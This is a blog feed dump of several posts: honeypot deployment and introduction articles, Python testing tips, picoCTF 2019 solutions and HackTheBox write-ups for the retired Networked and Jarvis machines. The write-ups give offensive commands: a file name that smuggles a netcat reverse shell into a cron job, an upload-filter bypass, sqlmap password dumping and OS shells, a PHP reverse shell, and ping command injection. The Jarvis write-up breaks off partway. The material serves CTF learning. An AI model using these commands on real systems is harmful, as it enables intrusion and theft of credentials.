</span><span class="nl">"src_ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0.0.0.0"</span><span class="p">,</span><span class="w"> </span><span class="nl">"src_port"</span><span class="p">:</span><span class="w"> </span><span class="mi">54282</span><span class="p">,</span><span class="w"> </span><span class="nl">"eventid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"mailhon.data"</span><span class="p">,</span><span class="w">
</span><span class="nl">"envelope_from"</span><span class="p">:</span><span class="w"> </span><span class="s2">"[email protected]"</span><span class="p">,</span><span class="w"> </span><span class="nl">"envelope_to"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"[email protected] "</span><span class="p">],</span><span class="w">
</span><span class="nl">"envelope_data"</span><span class="p">:</span><span class="w"> </span><span class="s2">"From: [email protected]</span><span class="se">\r\n</span><span class="s2">Subject: 42.42.42.42</span><span class="se">\r\n</span><span class="s2">
To: [email protected]</span><span class="se">\r\n</span><span class="s2">Date: Sat, 13 Jun 2020 23:56:59 -0700</span><span class="se">\r\n</span><span class="s2">X-Priority: 3</span><span class="se">\r\n</span><span class="s2">"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>
<p>A possible mitigation is to allow the first mail from every connection to leave the honeypot. Be advised that this bears legal implications as the system is technically sending out spam.<br />
Besides the fully-fledged production test there are other sanity checks that can be observed. As a general guideline, deployed Honeypots should expose a configuration and sizing that is similar to their real-world counterparts. This can be archived more easily on low and medium interaction HPs as they often emulate commands by looking up text files which massively eases the spoofing of cluster states, replica configurations or even filesystem sizes.</p>
<h2 id="conclusion">Conclusion</h2>
<p>As one can see, there is a lot to consider and check when deploying Honeypots. But don’t fret - the work definitely pays off. It is very interesting to watch in realtime what is happening on your systems. But looking at logs isn’t that much fun, so join me in the next part for details on sighting and visualizing data!</p>
<p>Continue reading about visualizing all this data in <a href="/2021/03/05/honeypot-viz">Part 3</a>!</p>Deploying Honeypots right is not always straightforward and leaves plenty of room for mistakes. Join me for a while to learn about deployment and customization of Honeypots.My Python Testing Best Practices2020-08-31T15:00:00+00:002020-08-31T15:00:00+00:00https://maddosaurus.github.io/2020/08/31/my-pytest-best-practices<p>As someone who has been using Python professionally in the younger past, I found some best practices regarding testing and project setup that work well for me. Today I’d like to share them with you.</p>
<!--more-->
<p><strong>TL;DR</strong>: The repo containing demo code: <a href="https://github.com/Maddosaurus/pytest-practice">Maddosaurus/pytest-practice</a>.</p>
<h2 id="project-setup">Project Setup</h2>
<p>The project setup is based on Kenneth Reitz’ <a href="https://docs.python-guide.org/">Hitchhiker’s Guide To Python</a>. It follows the idea of a seperate module accompanied by tests and supporting info on the same level (i.e. not contained in the module itself). This keeps the module lean and small.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Module containing the code</span>
pytdemo/pytdemo.py
pytdemo/util.py
<span class="c"># Testsuite</span>
tests/conftest.py
tests/test_pytdemo.py
tests/test_util.py
<span class="c"># Supporting information</span>
.gitignore
LICENSE
README.md
requirements.txt
setup.py
</code></pre></div></div>
<p>As one can see, the module itself only contains the bare essentials. The test suite is organized to roughly match the submodules, but this is an idea I only use for smaller modules. If submodules get larger and more complex, I tend to group tests by behaviour or logical groups.</p>
<h2 id="test-setup">Test Setup</h2>
<p>Personally, I’m using a wild mixture of <a href="https://docs.pytest.org/en/stable/">pytest</a>, <a href="https://docs.python.org/3/library/unittest.mock.html#unittest.mock.MagicMock">unittest.mock.MagicMock</a> and <a href="https://requests-mock.readthedocs.io/en/latest/">requests-mock</a> - the last one only if the module is using <code class="language-plaintext highlighter-rouge">requests</code> directly to interact with REST APIs.<br />
As a general recommendation, you should monitor your test coverage. To do that, I like to use <a href="https://pytest-cov.readthedocs.io/en/latest/readme.html">pytest-cov</a>, which is a powerful tool that can generate nice reports with the <code class="language-plaintext highlighter-rouge">--cov-report html</code> option.<br />
A word of caution: Aiming for 100% coverage is a great thing to do, but don’t try to enforce it. This can end up being extremely tedious and sometimes impossible. Try to find smart goals instead, i.e. agreeing on covering all functionally important parts of your project.</p>
<h3 id="the-conftest-file">The conftest File</h3>
<p>You might have noticed that there is a <code class="language-plaintext highlighter-rouge">conftest.py</code> living in the <code class="language-plaintext highlighter-rouge">tests</code> folder. This file is used to store shared <a href="https://docs.pytest.org/en/stable/fixture.html">pytest fixtures</a> that can be used in all test files. This is highly recommended, especially for helper functions and data sources.<br />
In the example code you will find a fixture here that creates a custom instance of the main module which contains an URL that is pointing to localhost. This is to ensure that even if your mocked endpoints don’t catch every call, you’ll be the first to know (and also, we’re avoiding hitting the real service with test-based requests).</p>
<h2 id="patching-monkeys">Patching Monkeys</h2>
<p>There is one problem when writing tests: You want to test as small and free of side effects as possible. This can be achieved by mocking away all calls to other functions the subject under test (SUT) is calling. Pytest does this by providing multiple mechanisms with <a href="https://docs.pytest.org/en/stable/monkeypatch.html"><code class="language-plaintext highlighter-rouge">monkeypatch</code></a> being my favourite for its balance between readability and explicitness.<br />
As an example:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">test_get_all_URL</span><span class="p">(</span><span class="n">crt_mock</span><span class="p">,</span> <span class="n">monkeypatch</span><span class="p">):</span>
<span class="c1"># Set up a mock that will replace the requests module in CrtSh and use it
</span> <span class="c1"># The MagicMock class comes in handy as it does a lot in the background for us.
</span> <span class="n">requests_mock</span> <span class="o">=</span> <span class="n">MagicMock</span><span class="p">()</span>
<span class="n">monkeypatch</span><span class="p">.</span><span class="nb">setattr</span><span class="p">(</span><span class="n">pytdemo</span><span class="p">.</span><span class="n">requests</span><span class="p">,</span> <span class="s">"get"</span><span class="p">,</span> <span class="n">requests_mock</span><span class="p">)</span>
<span class="n">crt_mock</span><span class="p">.</span><span class="n">get_all</span><span class="p">(</span><span class="s">"testhost.domain"</span><span class="p">)</span>
<span class="c1"># Check it the requests module was called with the correct URL
</span> <span class="n">requests_mock</span><span class="p">.</span><span class="n">assert_called_once_with</span><span class="p">(</span>
<span class="s">"https://test.local/"</span><span class="p">,</span>
<span class="n">params</span><span class="o">=</span><span class="p">{</span><span class="s">"Identity"</span><span class="p">:</span> <span class="s">"testhost.domain"</span><span class="p">,</span> <span class="s">"output"</span><span class="p">:</span> <span class="s">"json"</span><span class="p">}</span>
<span class="p">)</span>
</code></pre></div></div>
<p>In the example the <em>get</em> function of <code class="language-plaintext highlighter-rouge">requests</code> is replaced with a custom <code class="language-plaintext highlighter-rouge">MagicMock</code> object which will save every call to it.<br />
As you can see, the test is divided into three parts:</p>
<ol>
<li>Arrange - Set up all required vars, data and mocks</li>
<li>Act - Call the SUT</li>
<li>Assert - Checking the result for correctness</li>
</ol>
<p>This threefold structure improves readability - conventions often help to make your job as a team easier. It is actually a well known pattern called <a href="https://freecontent.manning.com/making-better-unit-tests-part-1-the-aaa-pattern/">AAA - Arrange, Act, Assert</a> and I recommend reading a bit more about it if you’re interested in writing better Unit Tests.</p>
<p>As you can see, combining different Python tools for testing can yield a very powerful setup that allows you to build your tests quick and easy.</p>
<h2 id="final-thoughts">Final Thoughts</h2>
<p>I’m merely scratching the surface with this post. There are many more modules and best practices I’d like to share over time that easen your life as a Python dev.<br />
For now, keep in mind that testing might feel it is slowing you down but in fact ensures that you keep your current speed. Writing good Unit Tests ensures that all the parts in your module work as intended and keep working as intended - even when you’re changing and refactoring the code. This also means that you should run your tests often, so please make sure that they execute as fast as possible.<br />
Finally, maybe the most important tests you’ll write are the ones that are created in the context of a bug ticket:<br />
Try reproducing the bug with a Unit Test first before attempting to fix it. With this order of operations you ensure that the bug is fixed and that it won’t come back at a later stage, so get testing!</p>As someone who has been using Python professionally in the younger past, I found some best practices regarding testing and project setup that work well for me. Today I’d like to share them with you.picoCTF 2019 - General Skills2020-06-28T22:00:00+00:002020-06-28T22:00:00+00:00https://maddosaurus.github.io/2020/06/28/picoCTF-general<p>The picoCTF 2019 contained multiple challenges in the “General” category. As most of these were rather short, they are documented in a collective post rather than single ones.</p>
<!--more-->
<p>Name: Let’s Warm Up<br />
Points: 50<br />
Challenge: If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII?<br />
Solution: A quick lookup in a <a href="http://www.asciitable.com/">table</a> yields “p”, so the answer would be <code class="language-plaintext highlighter-rouge">picoCTF{p}</code>.</p>
<hr />
<p>Name: Warmed Up<br />
Points: 50<br />
Challenge: What is 0x3D (base 16) in decimal (base 10)?<br />
Solution: For example, open the Windows Calculator (calc.exe), set it to “Programmer”, select HEX, then enter 3D.</p>
<hr />
<p>Name: 2Warm<br />
Points: 50<br />
Challenge: Can you convert the number 42 (base 10) to binary (base 2)?<br />
Solution: Same as “Warmed Up”, using calc in Programmer by selecting DEC, entering 42 and reading solution from BIN.</p>
<hr />
<p>Name: Bases<br />
Points: 100<br />
Challenge: What does this bDNhcm5fdGgzX3IwcDM1 mean? I think it has something to do with bases.<br />
Solution: By educated guessing, it looks like a base64-encoded string. On Linux, this can be decrypted by using <code class="language-plaintext highlighter-rouge">echo "bDNhcm5fdGgzX3IwcDM1" | base64 -d</code> which yields the flag.</p>
<hr />
<p>Name: First Grep<br />
Points: 100<br />
Challenge: Can you find the flag in <a href="https://2019shell1.picoctf.com/static/c36821c1ffbd5ed01f10ba2ed05ab413/file">file</a>? This would be really tedious to look through manually, something tells me there is a better way. You can also find the file in /problems/first-grep_6_c2319e8af66fa6bec197edc733dd52dd on the shell server.<br />
Solution: As the challenge name hints, the use of grep helps solving this challenge. By executing <code class="language-plaintext highlighter-rouge">cat file | grep picoCTF</code> the flag gets yielded.</p>
<hr />
<p>Name: Resources<br />
Points: 100<br />
Challenge: We put together a bunch of resources to help you out on our website! If you go over there, you might even find a flag! https://picoctf.com/resources (<a href="https://picoctf.com/resources">link</a>)<br />
Solution: Open the link and read the page. The flag can be found in the text.</p>
<hr />
<p>Name: strings it<br />
Points: 100<br />
Challenge: Can you find the flag in <a href="https://2019shell1.picoctf.com/static/7963880d17a07ff2009afa1687fda1cc/strings">file</a> without running it? You can also find the file in /problems/strings-it_5_1fd17da9526a76a4fffce289dee10fbb on the shell server.<br />
Solution: As the challenge name implies, the use of the Linux command “strings” helps in solving this challenge. <code class="language-plaintext highlighter-rouge">strings strings | grep picoCTF</code></p>
<hr />
<p>Name: what’s a net cat?<br />
Points: 100<br />
Challenge: Using netcat (nc) is going to be pretty important. Can you connect to 2019shell1.picoctf.com at port 4158 to get the flag?<br />
Solution: Calling netcat with the given parameters yields the flag: <code class="language-plaintext highlighter-rouge">nc 2019shell1.picoctf.com 4158</code></p>
<hr />
<p>Name: Based<br />
Points: 200
Challenge: To get truly 1337, you must understand different data encodings, such as hexadecimal or binary. Can you get the flag from this program to prove you are on the way to becoming 1337? Connect with nc 2019shell1.picoctf.com 44303.<br />
Solution:<br />
When connecting, you are greeted with multiple messages that are asking you to transcode mutliple formats into ASCII.<br />
It starts with binary, followed by octal and then hex without spacers:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Let us see how data is stored
chair
Please give the 01100011 01101000 01100001 01101001 01110010 as a word.
...
you have 45 seconds.....
Input:
chair
Please give me the 154 151 147 150 164 as a word.
Input:
light
Please give me the 706965 as a word.
Input:
pie
You've beaten the challenge
Flag: ...
</code></pre></div></div>
<p>Interestingly enough the words change on reconnection, so it is unlikely to just learn the words.
This is best done with an ASCII table at hand (i.e. http://www.asciitable.com/).</p>
<hr />
<p>Name: First Grep: Part II<br />
Points: 200<br />
Challenge: Can you find the flag in /problems/first-grep–part-ii_4_ca16fbcd16c92f0cb1e376a6c188d58f/files on the shell server? Remember to use grep.<br />
Solution:<br />
This challenge needs you to log in to the webshell. Once there, one can cd to the directory and do a recursive grep on all files:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd /problems/first-grep--part-ii_4_ca16fbcd16c92f0cb1e376a6c188d58f/files
grep -iR picoCTF* .
</code></pre></div></div>
<p>which yields the flag.</p>
<hr />
<p>Name: plumbing<br />
Points: 200<br />
Challenge: Sometimes you need to handle process data outside of a file. Can you find a way to keep the output from this program and search for the flag? Connect to 2019shell1.picoctf.com 21957.<br />
Solution:
On connect, the console is spammed with a lot of output. As the challenge name hints, one can redirect the output into a file and the grep that file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc 2019shell1.picoctf.com 21957 > out.txt
cat out.txt | grep picoCTF
</code></pre></div></div>
<p>which yields the flag.</p>
<hr />
<p>Name: whats-the-difference<br />
Points: 200<br />
Challenge: Can you spot the difference? <a href="https://2019shell1.picoctf.com/static/473cf765877f28edf95140f90cd76b59/kitters.jpg">kitters</a> <a href="https://2019shell1.picoctf.com/static/473cf765877f28edf95140f90cd76b59/cattos.jpg">cattos</a> They are also available at /problems/whats-the-difference_0_00862749a2aeb45993f36cc9cf98a47a on the shell server<br />
Solution: The pictures differ at multiple places by one byte. By comparing them byte by byte and printing the differing bytes from cattos.jpg, we get the flag. <code class="language-plaintext highlighter-rouge">cmp -bl cattos.jpg kitters.jpg | awk '{print $3}' | tr -d "\n"</code></p>
<hr />
<p>Name: where-is-the-file<br />
Points: 200<br />
Challenge: I’ve used a super secret mind trick to hide this file. Maybe something lies in /problems/where-is-the-file_2_f1aa319cafd4b55ee4a60c1ba65255e2.<br />
Solution:<br />
The file in question is a “hidden” file whose name begins with a dot (.). To list these, the ls command needs the -h parameter:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd /problems/where-is-the-file_2_f1aa319cafd4b55ee4a60c1ba65255e2
ls -lah
cat .cant_see_mee
</code></pre></div></div>
<hr />
<p>Name: flag_shop<br />
Points: 300<br />
Challenge: There’s a flag shop selling stuff, can you buy a flag? <a href="https://2019shell1.picoctf.com/static/23b8f90691073c4466b11fe2bae8d6ae/store.c">Source</a>. Connect with nc 2019shell1.picoctf.com 29250.<br />
Solution: Upon connection, a text-based menu is presented to the user. There is not enough money in the account to buy the “real” flag.<br />
Upon inspection of the source code, it becomes apparent that the total cost for buying a flag is stored as an integer and could be overflowed by buying a very large number of flags, as this is the calculation base for <code class="language-plaintext highlighter-rouge">total_cost</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span><span class="p">(</span><span class="n">number_flags</span> <span class="o">></span> <span class="mi">0</span><span class="p">){</span>
<span class="kt">int</span> <span class="n">total_cost</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">total_cost</span> <span class="o">=</span> <span class="mi">900</span><span class="o">*</span><span class="n">number_flags</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">The final cost is: %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">total_cost</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">total_cost</span> <span class="o"><=</span> <span class="n">account_balance</span><span class="p">){</span>
<span class="n">account_balance</span> <span class="o">=</span> <span class="n">account_balance</span> <span class="o">-</span> <span class="n">total_cost</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Your current balance after transaction: %d</span><span class="se">\n\n</span><span class="s">"</span><span class="p">,</span> <span class="n">account_balance</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>By doing so, the cost turns negative, effectively adding money into the users’ account:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to the flag exchange
We sell flags
(...)
Enter a menu selection
2
Currently for sale
1. Defintely not the flag Flag
2. 1337 Flag
1
These knockoff Flags cost 900 each, enter desired quantity
3579138
The final cost is: -1073743096
Your current balance after transaction: 1073744196
Welcome to the flag exchange
We sell flags
(...)
Enter a menu selection
2
Currently for sale
1. Defintely not the flag Flag
2. 1337 Flag
2
1337 flags cost 100000 dollars, and we only have 1 in stock
Enter 1 to buy one1
YOUR FLAG IS:
</code></pre></div></div>
<hr />
<p>Name: mus1c<br />
Points: 300<br />
Challenge: I wrote you a <a href="https://2019shell1.picoctf.com/static/e0b32d09ed9e6cf0d4a7ded906a29e21/lyrics.txt">song</a>. Put it in the picoCTF{} flag format<br />
Solution: The song turns out to be lyrics. On closer inspection, it turns out there is a programming language called <a href="https://codewithrockstar.com/online">rockstar</a>. When used with the online sandbox of rockstar, the lyrics turn out to be a running program that produces output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>114
114
114
111
99
107
110
(...)
</code></pre></div></div>
<p>This output can then be translated into the flag (decimal to character).</p>
<hr />
<p>Name: 1_wanna_b3_a_r0ck5tar<br />
Points:<br />
Challenge: I wrote you another <a href="https://2019shell1.picoctf.com/static/c7fa1eda3444e700dfd8addb3cf8e806/lyrics.txt">song</a>. Put the flag in the picoCTF{} flag format.<br />
Solution: This is again a valid rockstar program. This time it requires input. The easiest way is to patch it and remove all input and parts that rely on the input:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Rocknroll is right
Silence is wrong
A guitar is a six-string
Tommy's been down
Music is a billboard-burning razzmatazz!
Tommy is rockin guitar
Shout Tommy!
Music is amazing sensation
Jamming is awesome presence
Scream Music!
Scream Jamming!
Tommy is playing rock
Scream Tommy!
They are dazzled audiences
Shout it!
Rock is electric heaven
Scream it!
Tommy is jukebox god
Say it!
Break it down
Shout "Bring on the rock!"
</code></pre></div></div>
<p>which yields the desired output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>66
79
(...)
</code></pre></div></div>The picoCTF 2019 contained multiple challenges in the “General” category. As most of these were rather short, they are documented in a collective post rather than single ones.What are Honeypots and why do I want them?2020-06-19T09:00:00+00:002020-06-19T09:00:00+00:00https://maddosaurus.github.io/2020/06/19/honeypot-intro<p>Honeypots can provide valuable insights into the threat landscape, both in the open internet as well as your internal network. Deploying them right is not always straightforward, just like interpreting any activity on them.</p>
<!--more-->
<p>This is part 1 of a series detailing visualization, automation, deployment considerations, and pitfalls of Honeypots.<br />
An extended version of this article and an according talk can be found at <a href="https://vblocalhost.com/conference/presentations/like-bees-to-a-honeypot-a-journey-through-honeypots/">Virus Bulletin 2020</a>.</p>
<p>As attacks on internet-facing infrastructure shifted to being mostly automated in recent years, Honeypots lost some of their meaning in detecting novel exploits and attacks on said infrastructure. Combined with the fact that the people running Honeypots usually don’t want to give away details on how they customized them to keep them from being detected, this leads to a situation where the value of running them got upstaged. Although the means of operation of attackers has changed, Honeypots still allow valuable insights into ongoing campaigns, used credentials and distributed payloads.</p>
<p>To uderstand what value Honeypots bring to the table, it is imperative to know, what they are used for.<br />
Basically, Honeypots mimic systems that look vulnerable and therefore are valuable targets for attacks. This can either be a vulnerable looking service (i.e. SSH, Elastic) or client (i.e. Browsers).<br />
The latter emulates a browser to find websites that for example try to execute malicious payloads on clients, like JavaScript Cryptominers or Drive-By-Downloads.
The former emulates a complete server or protocol to find tools, techniques and procedures used by malicious actors. Such Honeypots can be used to uncover for example attacks tailored to overtake publicly accessible IoT devices or ransom unsecured MongoDB instances.<br />
Server-side Honeypots can further be grouped into three categories based on the level of emulation they provide: Low, Medium and High Interaction Honeypots.
Low interaction Honeypots are rather easy to build, as they often emulate only the basic commands of a protocol. For SSH, a low interaction HP can consist only of the login dialog to collect usernames and passwords potentially used in credential stuffing attacks.<br />
Medium interaction Honeypots take this principle a step further and emulate more commands and part of the surrounding system. As an example, the medium interaction HP <a href="https://github.com/cowrie/cowrie">Cowrie</a> emulates a complete filesystem as well as many integrated system commands like lsof or netstat to look like a fully running system.<br />
Finally, high interaction Honeypots represent a fully functioning implementation of the protocol in question, often made available through a Man-in-the-Middle (MitM) proxy which logs every interaction with the HP. For SSH this is represented by <a href="https://github.com/eg-cert/dockpot">Dockpot</a>, which is a HP that is running a full Linux system in an image, exposing the SSH connection through a MitM proxy that logs all interactions and issued commands. For every connection from a distinct source IP, a new container will be created and kept until a timeout is reached. This not only enabled connection separation but also persistency across connections, as the attacker finds the filesystem with all changes and additions that were conducted during the first connection.
All three groups have their advantages and use cases. While detail and insight grow from using low to high interaction Honeypots, the error potential, attack surface, hardware demand and general complexity increase as well.<br />
<img src="/images/interaction-stack.png" alt="Graphic that illustrates that detail and insight grow when moving from low to high interaction honeypots, but that also error potential, attack surface, hw demand and complexity grow." /><br />
Low and Medium interaction HPs are often developed as scripts being run by an interpreter, i.e. Python. While they provide limited insight and are relatively easy to detect, they can be installed on virtually any OS that is able to run a fitting Python distribution. This could be anything ranging from a Raspberry Pi up to fully fledged standalone Hardware or cloud deployments.<br />
High interaction HPs are often based on virtualization or containerization technologies and require a more advanced setup. This includes using sufficiently powerful hardware, configuring the abstraction layer, and setting up VMs or containers.<br />
Therefore, goals, budget, and time constraints should be known before deciding which Honeypot will be deployed.</p>
<p>Continue reading about deploying and customizing your honeypot in <a href="/2020/11/24/honeypot-deyploment">Part 2</a>!</p>Honeypots can provide valuable insights into the threat landscape, both in the open internet as well as your internal network. Deploying them right is not always straightforward, just like interpreting any activity on them.HTB - Networked2020-06-07T22:00:00+00:002020-06-07T22:00:00+00:00https://maddosaurus.github.io/2020/06/07/htb-networked<p>Writeup for the retired HTB machine Networked<br />
Link: https://www.hackthebox.eu/home/machines/profile/203<br />
IP: 10.10.10.146</p>
<!--more-->
<h2 id="recon">Recon</h2>
<p>The box has a web service on port 80 running, so common URL paths are in focus.</p>
<h2 id="gobuster">gobuster</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/index.php (Status: 200)
/uploads (Status: 301)
/photos.php (Status: 200)
/upload.php (Status: 200)
/lib.php (Status: 200)
/backup (Status: 301)
</code></pre></div></div>
<p>A complete backup of the website source code can be found in the <code class="language-plaintext highlighter-rouge">/backup</code> folder.<br />
As code access is at hand, the next step is to try and get a webshell up and running.<br />
It seems that upload filters are in place, which <a href="https://github.com/xapax/security/blob/master/bypass_image_upload.md">can be tricked</a>.<br />
The uploader can be tricked by renaming the payload to <code class="language-plaintext highlighter-rouge">file.php;.jpg</code>. This renders the last extension as a comment for PHP but bypasses the filter.
This results in the file being uploaded and makes the shell available for use.</p>
<h2 id="getting-a-full-user">Getting a full user</h2>
<p>Enumerating common priviledge escalation paths, a regular running cron job named <code class="language-plaintext highlighter-rouge">check_attack.php</code> in the user home folder can be discovered.</p>
<p>The script does its heavy lifting in <code class="language-plaintext highlighter-rouge">/var/www/html/uploads</code> and <a href="https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt">based on tricks shared in this article</a>, one could try to create a file with a name like<br />
<code class="language-plaintext highlighter-rouge">touch ";nc -c bash 10.10.15.195 4444"</code><br />
Which yields an incoming connection with user privileges (<em>guly</em>) on the next cron run.</p>
<h2 id="road-to-root">Road to root</h2>
<p>Checking common escalation paths from this user, it turns out the user is allowed to run a script named <code class="language-plaintext highlighter-rouge">changename.sh</code> with root privileges.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>---
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
</code></pre></div></div>
<p>Looking at <code class="language-plaintext highlighter-rouge">changename.sh</code> yields that we’re interested in escaping the predefined vars.<br />
Once seen, it’s kind of easy. Fill out all names without spaces.<br />
After close inspection it turns out that if all names are filled without spaces and the last variable is named <code class="language-plaintext highlighter-rouge">asd bash</code>, a root shell is spawned.</p>Writeup for the retired HTB machine Networked Link: https://www.hackthebox.eu/home/machines/profile/203 IP: 10.10.10.146HTB - Jarvis2020-06-07T19:00:00+00:002020-06-07T19:00:00+00:00https://maddosaurus.github.io/2020/06/07/htb-jarvis<p>Writeup for the retired HTB machine Jarvis<br />
Link: https://www.hackthebox.eu/home/machines/profile/194<br />
IP: 10.10.10.143</p>
<!--more-->
<h2 id="recon">Recon</h2>
<p>nmap reveals a very limited port selection:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
5355/tcp filtered llmnr
64999/tcp open http Apache httpd 2.4.25 ((Debian))
</code></pre></div></div>
<p>The web page on port 80 is a php site with not much at the first glance.<br />
On port 64999 you’ll get a blank page with “Hey you have been banned for 90 seconds, don’t be bad” on the first call.<br />
As a preliminary investigation, gobuster is used to find additional content on the webserver.</p>
<h2 id="gobuster-port-80">Gobuster port 80</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/images (Status: 301)
/index.php (Status: 200)
/nav.php (Status: 200)
/footer.php (Status: 200)
/back.php (Status: 200)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/phpmyadmin (Status: 301)
/connection.php (Status: 200)
/room.php (Status: 302)
/sass (Status: 301)
/server-status (Status: 403)
</code></pre></div></div>
<p>Exploring the website leads to weird reactions if the Room Booking (http://10.10.10.143/room.php?cod=1) is manipulated with. Guessing from these results and the URL schema, a closer inspection of SQL Injection capabilities was concluded.</p>
<h2 id="sqlmap">SQLMap</h2>
<p>Running SQLmap with the dump parameter yields to successful execution.
<code class="language-plaintext highlighter-rouge">sqlmap -u http://10.10.10.143/room.php?cod=2 --dump</code></p>
<p>As a next step, a password dump is attempted with <em>rockyou.txt</em> as dictionary file:
<code class="language-plaintext highlighter-rouge">sqlmap -u http://10.10.10.143/room.php?cod=2 --passwords</code>
which is successful:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[10:43:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
(...)
[10:44:04] [INFO] starting dictionary-based cracking (mysql_passwd)
[10:44:04] [INFO] starting 2 processes
[10:44:04] [INFO] cracked password 'imissyou' for user 'DBadmin' (...)
database management system users password hashes:
[*] DBadmin [1]:
password hash: *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
clear-text password: imissyou
</code></pre></div></div>
<p>With these credentials, loggin into phpMyAdmin is possible. As SQLMap is also able to spawn shells under certain circumstances, this is worth trying as well:<br />
<code class="language-plaintext highlighter-rouge">sqlmap -u http://10.10.10.143/room.php?cod=2 --os-shell</code><br />
which yields a shell as <code class="language-plaintext highlighter-rouge">www-data</code>. By looking around a bit, we learn that the target OS user is named <code class="language-plaintext highlighter-rouge">pepper</code>.<br />
Also, there’s an interesting script in <code class="language-plaintext highlighter-rouge">/var/www/Admin-Utilities</code>, it’s <code class="language-plaintext highlighter-rouge">simpler.py</code>.<br />
Again, with SQLMap, this file can be downloaded:<br />
<code class="language-plaintext highlighter-rouge">sqlmap -u http://10.10.10.143/room.php?cod=2 --file-read=/var/www/Admin-Utilities/simpler.py</code>
On closer inspection, the script seems to execute actions in the user home folder of pepper. As this script is executed as <em>www-data</em>, there must be a sudo entry to run it as <em>pepper</em>. This can be confirmed by running <code class="language-plaintext highlighter-rouge">sudo -l</code>:<br />
<code class="language-plaintext highlighter-rouge">sqlmap -u http://10.10.10.143/room.php?cod=2 --os-cmd="sudo -l"</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
</code></pre></div></div>
<p>At this point, a switch to a fully interactive session is needed. This can be archieved by running a local webserver on the attacker machine and serving a prepared PHP reverse shell (<em>apalaxsh.php</em>) that is downloaded via <code class="language-plaintext highlighter-rouge">wget</code> or <code class="language-plaintext highlighter-rouge">curl</code> to the target systems web dir (www-data).
With a running netcat receiver on the attacker machine (<code class="language-plaintext highlighter-rouge">nc -nvlp 9999</code>), the shell is triggered by pointing a browser to <code class="language-plaintext highlighter-rouge">/apalaxsh.php</code>, which yields a shell.</p>
<h2 id="road-to-user">Road to user</h2>
<p>Now the script can be further examined in its native run environment as sudoed user:<br />
<code class="language-plaintext highlighter-rouge">sudo --user=pepper /var/www/Admin-Utilities/simpler.py</code></p>
<p>This <a href="https://packetstormsecurity.com/files/144749/Infoblox-NetMRI-7.1.4-Shell-Escape-Privilege-Escalation.html">article on Infoblox Shell Escape</a> provides some ideas on how to escape via sudo/ping:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo --user=pepper /var/www/Admin-Utilities/simpler.py -p
Enter an IP: $(cat /home/pepper/user.txt)
ping: 2afa36c4f05b37b34259[...]]: Temporary failure in name resolution
</code></pre></div></div>
<p>which yields the user flag.<br />
But this is not everything this shell can do. By upgrading the shell to a full interactive shell first (<code class="language-plaintext highlighter-rouge">python -c 'import pty; pty.spawn("/bin/sh")'</code>),<br />
we’re able to spawn a shell as pepper:</p>
